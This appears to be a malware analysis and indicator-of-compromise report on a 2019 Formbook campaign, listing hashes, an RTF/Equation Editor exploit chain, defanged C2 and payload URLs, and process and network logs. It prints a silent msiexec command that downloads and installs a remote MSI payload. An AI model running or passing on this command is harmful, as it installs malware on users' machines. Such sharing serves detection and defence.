VRad

#formbook_070519

May 8th, 2019
#IOC #OptiData #VR #formbook #RTF11882 #exe2msi #opendir

https://pastebin.com/H2mkW82S

previous_contact:
22/04/19 https://pastebin.com/1FMBBK3N
26/02/19 https://pastebin.com/yLu1cL9K
15/11/18 https://pastebin.com/VFG89LnT
14/11/18 https://pastebin.com/D6VPDyyz

FAQ:
http://www.exetomsi.com/freeware

attack_vector
--------------
email attach .doc (RTF) > 11882 > msiexec GET msi > install (broken)

email_headers
--------------
n/a

files
--------------
SHA-256 167441aa99bbbe621a775528f8c20724c6091e65d80fdf700389f0c9af41ead7
File name PO-20190507.doc [RTF]
File size 311.08 KB (318542 bytes)

SHA-256 1c9fe57b3adaa58d86bcc8f683d6496c1ce40ee468434d768543910e8442f999
File name 1.msi [MSI Installer, Exe to msi converter free]
File size 556 KB (569344 bytes)

SHA-256 f6c6bed0e6a223f26de874256e0ce8443a6203634aa2d2871c0cbec73adcb397
File name MSID06.tmp [PE32 executable (GUI) Intel 80386, for MS Windows]
File size 530.5 KB (543232 bytes)

activity
**************
PL_SCR h11p:\ joeing2{.} duckdns{.} org/joe/1.msi

C2 h11p:\kvkhbw{.} com/jo/

cmd.exe & /C CD C: & msiexec.exe /i h11p:\ joeing2{.} duckdns{.} org/joe/1.msi /quiet

Error 1722. There is a problem with this Windows Installer package.
A program run as part of the setup did not finish as expected.
Contact your support personnel or package vendor.
Action _B3D13F97_1369_417D_A477_B4C42B829328, location: C:\Windows\Installer\MSI49E9.tmp, command: /S
=== Logging stopped: ??.??.2019 11:24:24 ===

netwrk
--------------
23.249.162.144 joeing2{.} duckdns{.} org GET /joe/1.msi HTTP/1.1 Windows Installer

comp
--------------
msiexec.exe 3096 TCP localhost 50104 23.249.162.144 80 ESTABLISHED

proc
--------------
"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
... [not children, another context]
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
... [not children, another context]
C:\Windows\SysWOW64\cmd.exe & /C CD C: & msiexec.exe /i http://joeing2{.} duckdns{.} org/joe/1.msi /quiet
C:\Windows\SysWOW64\msiexec.exe /i http://joeing2{.} duckdns{.} org/joe/1.msi /quiet
... [not children, another context]
C:\Windows\system32\msiexec.exe
"C:\Windows\Installer\MSI49E9.tmp" /S

persist
--------------
n/a

drop
--------------
C:\Windows\Installer\MSI49E9.tmp
%temp%\MSI6769f.LOG


VR